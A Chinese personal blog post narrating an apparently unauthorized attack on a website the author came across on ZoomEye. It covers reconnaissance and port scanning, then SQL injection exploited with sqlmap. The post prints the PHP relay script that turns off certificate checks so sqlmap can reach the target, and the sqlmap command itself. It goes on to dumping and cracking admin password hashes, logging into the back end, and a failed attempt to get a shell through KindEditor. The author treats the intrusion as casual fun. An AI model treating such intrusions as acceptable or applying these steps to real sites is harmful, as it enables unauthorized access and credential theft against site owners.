一次浪荡的渗透

  1. 前言
  2. 信息收集

前言

在zoomeye瞎逛,找到个站,顺手搞搞,到后面还是没能拿下shell,kindeditor编辑器真草….

eu99t1.png

信息收集

zoomeye搜到的就是一个IP
eu9R41.png

whois就不查了,毛用没有又不是搞服务商…..除了自我安慰,哎
旁站查询走一波:同IP网站查询,C段查询,IP反查域名,C段旁注,旁注工具
eu9f9x.png

我他妈….
eu9h36.jpg

用ip138查查同IP
域名查iP 域名解析 iP查询网站 iP反查域名 iP反查网站 同一iP网站 同iP网站域名iP查询
euCV2V.png

域名全部ping了一遍…发现一个域名不是同一个IP,超级ping了一下,发现在山西有个节点
euC5in.png

端口扫描了一波,发现有节点的那个域名出现在443端口,估计是多个域名解析到同一个DNS
euCzJ1.png

7kb扫描工具一顿扫,没扫出来
euATDf.png

。。。
eu9h36.jpg

打开这个站一看,后台光明正大的写在主页
euEV2R.md.png

。。。
eu9h36.jpg

整理了一下收集到的信息
euZkcR.png

随便点了一下链接发现有类似&id=的url,测试了一下注入,发现SQL注入
euEgs0.png

当时就想着扔sqlmap里面跑,然后sqlmap报错。。后面想了一下这个的https证书是有问题的,还有就是sqlmap跑类似于以下的url会发神经

http://test.com/test.php?user=demo&id=1

euEzJH.png

https证书有问题
euViOP.png

百思不得其解的时候,搜到了篇文章
sqlmap在https情况下的一个错误 | MSAREHERE
文章的作者使用在本地写了个php,然后使用curl配置屏蔽掉https错误,然后在通过curl发送数据给目标站点

<?php

$url = "http://xxx.com";
$sql = $_GET[s];
$s = urlencode($sql);
$url = $url.$sql;
echo $url;
// $params = "email=$s&password=aa";
//echo $params;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)');
curl_setopt($ch, CURLOPT_TIMEOUT, 15);

// curl_setopt($ch, CURLOPT_POST, 1);    // post 提交方式
// curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

$output = curl_exec($ch);
curl_close($ch);
echo $output;
$a = strlen($output);
echo $a;
?>

本地访问了一下还真的ok
euVJkF.png

然后直接扔sqlmap跑就ok

sqlmap -u http://127.0.0.1/demos.php?s=%20*

euValR.png

然后发现不是dba权限
euVfXt.png

dump出后台的hash发现还有两个跑不出
eu9h36.jpg

还好最后一个hash跑出来了
euVI78.png

得到用户名密码
euZVnx.png

后台一登陆,看见编辑器kindeditor
euZsuq.png

google搜了一遍,发现只能重命名或者备份getshell
eu9h36.jpg

[渗透实战]某铸造设备公司官网经典思路 - DYBOY - 专注程序开发与信息安全

原本打算子域名看看能不能搞的,查出来的都是什么
eueV2j.png
本文到此结束,真是玩毛….
eu9h36.jpg


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:一次浪荡的渗透

本文作者:九世

发布时间:2019-07-26, 18:15:25

最后更新:2019-07-26, 20:06:55

原始链接:http://422926799.github.io/posts/949b4019.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录